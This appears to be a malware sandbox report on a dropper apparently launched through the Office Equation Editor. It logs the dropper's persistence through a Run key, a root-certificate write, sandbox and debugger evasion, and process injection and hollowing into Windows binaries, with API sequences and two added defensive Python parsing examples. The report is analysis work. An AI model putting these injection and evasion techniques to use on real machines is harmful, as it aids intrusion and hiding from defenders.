Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A550 push 0042A57Ch; ret 4_2_0042A574
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040E5F8 push 0040E624h; ret 4_2_0040E61C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406588 push 004065B4h; ret 4_2_004065AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00406600 push 0040662Ch; ret 4_2_00406624
Source: C:\Users\Public\vbc.exe Code function: 4_2_00414628 push ecx; mov dword ptr [esp], eax 4_2_0041462B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428628 push 00428654h; ret 4_2_0042864C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A6FC push 0042A728h; ret 4_2_0042A720
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C6A4 push ecx; mov dword ptr [esp], edx 4_2_0041C6A6
Source: C:\Users\Public\vbc.exe Code function: 4_2_00440764 push 00440790h; ret 4_2_00440788
Source: C:\Users\Public\vbc.exe Code function: 4_2_004547B8 push 004547F0h; ret 4_2_004547E8
Source: C:\Users\Public\vbc.exe Code function: 4_2_004288FC push 00428928h; ret 4_2_00428920
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A958 push 0045A984h; ret 4_2_0045A97C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C918 push 0042C971h; ret 4_2_0042C969
Source: C:\Users\Public\vbc.exe Code function: 4_2_004289F8 push 00428A24h; ret 4_2_00428A1C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C9FF pushfd ; retf 0041h 4_2_0041CA51
Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A990 push 0045A9B6h; ret 4_2_0045A9AE
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042C9B4 push 0042C9ECh; ret 4_2_0042C9E4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042CA48 push 0042CA74h; ret 4_2_0042CA6C
Source: C:\Users\Public\vbc.exe Code function: 4_2_0043EA9C push ecx; mov dword ptr [esp], edx 4_2_0043EAA0
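Every "push X; ret" entry above has the same shape: the pushed immediate is exactly 8 bytes past the push site (the trailing 4_2_… address), i.e. two bytes past the ret that follows the 5-byte push. A push/ret that always lands a fixed couple of bytes ahead is a compiler jump-over, consistent with the try/finally exit sequence Delphi emits (the sample also reads HKCU\Software\Borland\Delphi\Locales, which is the Delphi runtime at start-up), not a hand-rolled redirect to a distant or computed address. The Python below is an added example, not part of the report, that parses these lines and sorts the pairs by displacement so the genuinely interesting ones stand out. The report lines are copied verbatim; the last sample line is constructed to show what a distant redirect looks like, and the 16-byte cut-off is the author's assumption.

```python
import re
from collections import Counter

# "... Code function: <fn> push <imm>h; ret <pid>_<run>_<site>"; the trailing id is the
# address of the push itself, not of the enclosing function.
PUSH_RET_RE = re.compile(
    r"Code function: (?P<fn>\S+) push (?P<target>[0-9A-Fa-f]+)h; ret \d+_\d+_(?P<site>[0-9A-Fa-f]+)$"
)

SAMPLE_LINES = [
    # Copied from the report:
    r"Source: C:\Users\Public\vbc.exe Code function: 4_2_0043DD6C push 0043DDF9h; ret 4_2_0043DDF1",
    r"Source: C:\Users\Public\vbc.exe Code function: 4_2_00458108 push 00458140h; ret 4_2_00458138",
    r"Source: C:\Users\Public\vbc.exe Code function: 4_2_0045A1B4 push 0045A427h; ret 4_2_0045A41F",
    r"Source: C:\Users\Public\vbc.exe Code function: 4_2_004201F8 push ecx; mov dword ptr [esp], edx 4_2_004201FD",
    r"Source: C:\Users\Public\vbc.exe Code function: 4_2_0041C9FF pushfd ; retf 0041h 4_2_0041CA51",
    # Constructed, not from the report: a push/ret whose target is far away.
    r"Source: C:\Users\Public\vbc.exe Code function: 4_2_00401000 push 00480000h; ret 4_2_00401010",
]

PUSH_IMM32_LEN = 5   # 68 imm32
RET_LEN = 1          # C3
SKIP_LIMIT = 16      # assumption: a forward hop no longer than this is a jump-over, not a redirect


def analyze(lines):
    """One row per push-imm32/ret pair: where it sits, where it goes, and how far that is."""
    rows = []
    for line in lines:
        m = PUSH_RET_RE.search(line)
        if not m:
            continue   # register pushes, pushfd/retf and the like are not push-imm32/ret pairs
        site = int(m.group("site"), 16)
        target = int(m.group("target"), 16)
        delta = target - site
        # With the ret directly after the push, fall-through would be site + 6;
        # bytes_skipped is how much code the pair steps over.
        bytes_skipped = delta - (PUSH_IMM32_LEN + RET_LEN)
        if 0 < delta <= SKIP_LIMIT:
            kind = "short forward skip (jump-over, compiler-style)"
        elif delta <= 0:
            kind = "backward redirect"
        else:
            kind = "distant redirect"
        rows.append({"function": m.group("fn"), "site": site, "target": target,
                     "delta": delta, "bytes_skipped": bytes_skipped, "kind": kind})
    return rows


def summarize(rows):
    return Counter(r["kind"] for r in rows)


if __name__ == "__main__":
    rows = analyze(SAMPLE_LINES)
    for r in rows:
        print(f"{r['function']}: push at {r['site']:08X} -> {r['target']:08X} "
              f"(+{r['delta']}, skips {r['bytes_skipped']} bytes) {r['kind']}")
    print(summarize(rows))
```

Run over the full listing, the report's pairs collapse into a single bucket with a constant displacement; anything that lands in the other two buckets is where a reverser should spend time. The "pushfd ; retf 0041h" line is excluded on purpose: it is not a push-immediate/ret pair and is the kind of thing a linear sweep produces from data or padding.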
Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00459820 LoadLibraryA,GetProcAddress, 4_2_00459820

Persistence and Installation Behavior:

Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\Esfjmbxd.exe
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\Esfjmbxd.exe

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\Esfjmbxd.exe
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Esfjmbxd
Source: C:\Users\Public\vbc.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Esfjmbxd

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 4_2_00451054
Source: C:\Users\Public\vbc.exe Code function: 4_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 4_2_0044E03C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 4_2_004389E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect, 4_2_00428C3C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 4_2_00439260
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 4_2_00451770
Source: C:\Users\Public\vbc.exe Code function: 4_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 4_2_00451820
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 8_2_00451054
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 8_2_0044E03C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0043812C IsIconic,GetCapture, 8_2_0043812C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 8_2_004389E0
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect, 8_2_00428C3C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 8_2_00439260
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 8_2_00451770
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 8_2_00451820
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00451054 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 11_2_00451054
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0044E03C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 11_2_0044E03C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0043812C IsIconic,GetCapture, 11_2_0043812C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_004389E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 11_2_004389E0
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00428C3C IsIconic,GetWindowPlacement,GetWindowRect, 11_2_00428C3C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00439260 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 11_2_00439260
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00451770 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 11_2_00451770
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_00451820 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 11_2_00451820
Stores large binary data to the registry
Source: C:\Users\Public\vbc.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
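That key path is the machine-wide trusted root store; the subkey name is the SHA-1 thumbprint of the certificate and the Blob value holds the certificate plus its properties. Seeing a dropped loader write there is either the sample adding its own root, or CryptoAPI's on-demand root update running inside the sample's process while it validated a chain, and the only way to tell is to look at what landed in the Blob. The Python below is an added example, not part of the report, that parses the Blob's record layout (uint32 property id, uint32 reserved = 1, uint32 length, payload) and checks the thumbprint against the key name. The property ids are the wincrypt.h constants; the "certificate" bytes are a constructed stand-in so the check runs offline, and the report's key name is used only to show a mismatch against that stand-in.

```python
import hashlib
import struct

# Property ids from wincrypt.h that appear in a registry certificate Blob.
CERT_SHA1_HASH_PROP_ID = 3
CERT_FRIENDLY_NAME_PROP_ID = 11
CERT_CERT_PROP_ID = 32   # the DER-encoded certificate itself


def build_record(prop_id, payload, reserved=1):
    """One Blob record: uint32 prop_id, uint32 reserved (1 in real data), uint32 length, payload."""
    return struct.pack("<III", prop_id, reserved, len(payload)) + payload


def build_blob(props):
    return b"".join(build_record(pid, data) for pid, data in props)


def parse_blob(data):
    """Split a Blob value into {prop_id: payload}; refuse anything that does not fit the layout."""
    props, off = {}, 0
    while off + 12 <= len(data):
        prop_id, reserved, length = struct.unpack_from("<III", data, off)
        off += 12
        if reserved != 1 or off + length > len(data):
            raise ValueError(f"malformed record at offset {off - 12}")
        props[prop_id] = data[off:off + length]
        off += length
    if off != len(data):
        raise ValueError("trailing bytes after the last record")
    return props


def thumbprint(der):
    return hashlib.sha1(der).hexdigest().upper()


def verify_entry(key_name, blob):
    """Does the subkey name (the SHA-1 thumbprint) match the certificate stored in the Blob?"""
    props = parse_blob(blob)
    cert = props.get(CERT_CERT_PROP_ID)
    if cert is None:
        return {"ok": False, "reason": "no certificate (property 32) in Blob"}
    computed = thumbprint(cert)
    stored = props.get(CERT_SHA1_HASH_PROP_ID, b"").hex().upper()
    name = props.get(CERT_FRIENDLY_NAME_PROP_ID, b"").decode("utf-16-le").rstrip("\0")
    return {
        "ok": computed == key_name.upper() and (stored == "" or stored == computed),
        "computed_thumbprint": computed,
        "stored_thumbprint": stored,
        "friendly_name": name,
        "cert_der": cert,   # hand this to your X.509 parser to read subject and issuer
    }


# Constructed stand-in: NOT a real certificate, just bytes playing the role of the DER
# payload so the parser and the thumbprint check can run without a Windows registry.
FAKE_DER = b"\x30\x82\x01\x00" + bytes(range(256))
FAKE_BLOB = build_blob([
    (CERT_FRIENDLY_NAME_PROP_ID, "constructed root\0".encode("utf-16-le")),
    (CERT_SHA1_HASH_PROP_ID, hashlib.sha1(FAKE_DER).digest()),
    (CERT_CERT_PROP_ID, FAKE_DER),
])

if __name__ == "__main__":
    # On the real box: reg export "HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\<thumbprint>" blob.reg
    # then pass the Blob's bytes and the thumbprint from the key name to verify_entry().
    result = verify_entry(thumbprint(FAKE_DER), FAKE_BLOB)
    print(result["ok"], result["friendly_name"], result["computed_thumbprint"])
    # The report's key name against the stand-in certificate naturally does not match:
    print(verify_entry("3F728A35DE52B2C8994A4FB101A03B95E87B06C8", FAKE_BLOB)["ok"])
```

A thumbprint that matches the key name only proves the entry is well formed; the verdict comes from the certificate in property 32. A self-signed root whose subject nobody recognises, installed by a process running out of C:\Users\Public, is the malware's doing and should be removed; a well-known CA root is more likely the automatic root update and can be cross-checked against Microsoft's published root list.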
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042A8F4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_0042A8F4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Esfjmbxd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmstp.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\logagent.exe RDTSC instruction interceptor: First address: 0000000072488604 second address: 000000007248860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\logagent.exe RDTSC instruction interceptor: First address: 000000007248898E second address: 0000000072488994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 0000000000108604 second address: 000000000010860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000000C8604 second address: 00000000000C860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmstp.exe RDTSC instruction interceptor: First address: 000000000010898E second address: 0000000000108994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe RDTSC instruction interceptor: First address: 00000000000C898E second address: 00000000000C8994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042D734 4_2_0042D734
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_0042D734 8_2_0042D734
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0042D734 11_2_0042D734
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1232 Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1940 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\Esfjmbxd.exe TID: 2256 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Esfjmbxd.exe TID: 1892 Thread sleep time: -240000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\cmstp.exe Last function: Thread delayed
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\Users\Public\vbc.exe Code function: 4_2_0042D734 4_2_0042D734
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_0042D734 11_2_0042D734
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 rdtsc 0_2_02E966E8
Contains functionality to detect sandboxes (mouse cursor move detection)
Source: C:\Users\Public\vbc.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 4_2_004505B0
Source: C:\Users\user\Esfjmbxd.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 8_2_004505B0
Source: C:\Users\user\Esfjmbxd.exe Code function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject, 11_2_004505B0
Source: C:\Windows\SysWOW64\logagent.exe Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Code function: 4_2_004244DC GetSystemInfo, 4_2_004244DC
Source: C:\Users\Public\vbc.exe Code function: 4_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_004057AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_042F7DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 4_2_042F7DE0
Source: C:\Users\Public\vbc.exe Code function: 4_2_042F56C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_042F56C4
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 8_2_004057AC
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A27DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 8_2_03A27DE0
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A256C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 8_2_03A256C4
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_004057AC GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 11_2_004057AC
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C17DE0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 11_2_03C17DE0
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C156C4 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 11_2_03C156C4

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Users\Public\vbc.exe Code function: 4_2_00459820 LoadLibraryA,GetProcAddress, 4_2_00459820
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_020826F8 mov eax, dword ptr fs:[00000030h] 6_2_020826F8
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\logagent.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cmstp.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\ipconfig.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_02E966E8 rdtsc 0_2_02E966E8
Enables debug privileges
Source: C:\Windows\SysWOW64\logagent.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cmstp.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\logagent.exe Code function: 6_2_02070048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_02070048

HIPS / PFW / Operating System Protection Evasion:

Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cmstp.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Allocates memory in foreign processes
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 80000 protect: page execute and read and write
Source: C:\Users\Public\vbc.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 90000 protect: page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 72480000 protect: page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 80000 protect: page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 90000 protect: page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: A0000 protect: page execute and read and write
Source: C:\Users\user\Esfjmbxd.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: B0000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000 value starts with: 4D5A
Contains functionality to inject code into remote processes
Source: C:\Users\Public\vbc.exe Code function: 4_2_042FCE34 CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread, 4_2_042FCE34
Creates a thread in another existing process (thread injection)
Source: C:\Users\Public\vbc.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 90000
Source: C:\Users\user\Esfjmbxd.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 90000
Source: C:\Users\user\Esfjmbxd.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: B0000
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\logagent.exe Section unmapped: C:\Windows\SysWOW64\cmstp.exe base address: A0000
Source: C:\Windows\SysWOW64\logagent.exe Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: A40000
Writes to foreign memory regions
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 80000
Source: C:\Users\Public\vbc.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 90000
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 72480000
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 80000
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 90000
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: A0000
Source: C:\Users\user\Esfjmbxd.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: B0000
Queues an APC in another process (thread injection)
Source: C:\Windows\SysWOW64\logagent.exe Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\logagent.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\cmstp.exe Thread register set: target process: 1764
Contains functionality to inject threads in other processes
Source: C:\Users\Public\vbc.exe Code function: 4_2_0430459C VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,lstrcpy,WriteProcessMemory,CreateRemoteThread,CloseHandle, 4_2_0430459C
Source: C:\Users\user\Esfjmbxd.exe Code function: 8_2_03A3459C VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,lstrcpy,WriteProcessMemory,CreateRemoteThread,CloseHandle, 8_2_03A3459C
Source: C:\Users\user\Esfjmbxd.exe Code function: 11_2_03C2459C VirtualAllocEx,GetModuleHandleA,GetProcAddress,GetProcAddress,lstrcpy,WriteProcessMemory,CreateRemoteThread,CloseHandle, 11_2_03C2459C
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: C:\Users\user\Esfjmbxd.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
Source: EXCEL.EXE, 00000000.00000002.680767984.0000000000890000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.680767984.0000000000890000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.680767984.0000000000890000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\vbc.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_00405984
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_004062CC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,GetACP, 4_2_0040CAF8
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_0040B4DC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_0040B528
Source: C:\Users\Public\vbc.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 4_2_00405A8F
